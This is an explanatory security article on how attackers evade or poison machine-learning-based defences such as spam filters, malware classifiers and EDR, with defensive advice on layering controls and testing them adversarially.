AI/ML Security

How Attackers Beat Your Machine Learning Security Controls

Jun 15, 20265 min read

A spam filter trained on millions of malicious emails. A malware classifier with 99.2 percent detection accuracy on the benchmark. A fraud detection model that flags unusual transactions in milliseconds. These tools exist, they work, and attackers have been quietly developing techniques to defeat them for years.

The field is called adversarial machine learning, and the security community's response to it has been, broadly, to not talk about it much while deploying ML-based controls as if the problem does not exist. That gap is going to cost someone eventually. It may already be costing you.

What "Adversarial" Actually Means

An adversarial input is an input crafted specifically to fool a machine learning model into producing an incorrect output. The concept originated in computer vision research, where adding tiny perturbations to an image can cause a model to misclassify it entirely, even when the change is invisible to a human.

The same principle applies to security models. A spam classifier trained to detect phishing emails can be fooled by rephrasing, injecting innocuous content, or mimicking the stylistic patterns of legitimate email in ways a human would immediately recognize as suspicious but the model has not learned to flag. A malware classifier looking for behavioral signatures can be defeated by adding junk code paths, randomizing function names, or structuring execution in ways that trigger normal-looking patterns while still delivering the payload.

The model has a boundary between what it classifies as malicious and what it classifies as benign. Adversarial techniques are about finding that boundary and staying just on the other side of it.

The AV and EDR Evasion Problem

The most practically important example for most organizations is antivirus and endpoint detection and response evasion. Modern AV and EDR products use ML models heavily. Static analysis of file structure and content, behavioral analysis of runtime actions, anomaly detection based on process relationships. These models are genuinely good at catching known malware families and many novel variants.

They are also systematically beaten by threat actors who know this is how detection works.

Polymorphic malware has existed for decades, but AI-assisted polymorphism is newer and more effective. Tools exist that take a known malware sample, automatically generate variants with different code structure, different encryption, different obfuscation patterns, and test them against detection engines until something passes. The resulting samples are functionally identical in what they do and unrecognized by models trained on the original.

Living-off-the-land techniques take a different approach: avoid deploying custom malware at all, and use legitimate system utilities to do attacker work. PowerShell, WMI, certutil, msiexec. These tools are on every Windows system, their execution is expected by the model, and their use for malicious purposes is hard to distinguish from their use for legitimate administration. ML models trained to flag suspicious behavior struggle when the behavior itself is indistinguishable from normal operations.

Poisoning Attacks

Evasion attacks target deployed models. Poisoning attacks target the training process itself.

If an attacker can influence the data a model is trained on, they can influence what the model learns. In security contexts, training data often includes samples submitted by users, feeds from threat intelligence platforms, or logs from production environments. Any of those channels can potentially be manipulated by an adversary with enough patience.

The goal of a poisoning attack is usually to introduce a backdoor: a specific pattern that causes the model to behave incorrectly while performing normally on everything else. A malware classifier with a backdoor might classify any sample containing a specific string as benign, regardless of what the sample actually does. The backdoor is invisible in normal testing because normal testing does not include the trigger.

This is not theoretical. Academic research has demonstrated practical poisoning attacks against models similar to those deployed in production security products. It has not yet been widely documented in production breach disclosures, but absence of disclosed incidents is not the same as absence of incidents.

What This Means for How You Use ML-Based Controls

The temptation, having absorbed all of this, is to conclude that ML-based security controls are untrustworthy. That conclusion is wrong in the same way that "locks can be picked so why bother" is wrong.

ML-based controls significantly raise the cost of attacks. Defeating a well-tuned detection model requires effort, iteration, and specialized knowledge that not every attacker has. The controls work against the majority of threats most organizations face, and that is genuinely valuable.

What should change is the assumption that ML-based controls are sufficient on their own. Defense in depth exists for exactly this reason. An attacker who evades your malware classifier still has to execute something. Execution triggers behavioral monitoring. Behavioral monitoring flags lateral movement. Lateral movement runs into network segmentation. Each layer makes evasion of all layers simultaneously more expensive.

Test your ML-based controls adversarially. Ask vendors specifically how their models are evaluated against adversarial inputs, not just against known malware families. Most vendors do not have a satisfying answer to this question, which is itself useful information.

Assume that any sufficiently motivated attacker targeting your organization specifically has already tested their tooling against the detection products you run. Many organizations publish enough information about their technology stack in job postings and vendor case studies to make this straightforward. A threat actor who has done that homework and arrives with tooling tuned to evade your specific detectors is a different problem than a commodity attack that your model handles correctly.

The Honest Position

ML in security is not magic. It is pattern matching at scale with impressive statistical performance on benchmark datasets, which is useful, combined with known exploitable weaknesses against adversaries who understand how it works, which is also real.

Building a security program that treats ML-based controls as a layer rather than a solution, that evaluates them adversarially rather than only against known-bad samples, and that maintains visibility through multiple overlapping mechanisms is not a hedge against the technology failing. It is the correct way to use the technology given what it actually is.

The benchmark says 99.2 percent. The adversary has already done the math on what the other 0.8 percent requires.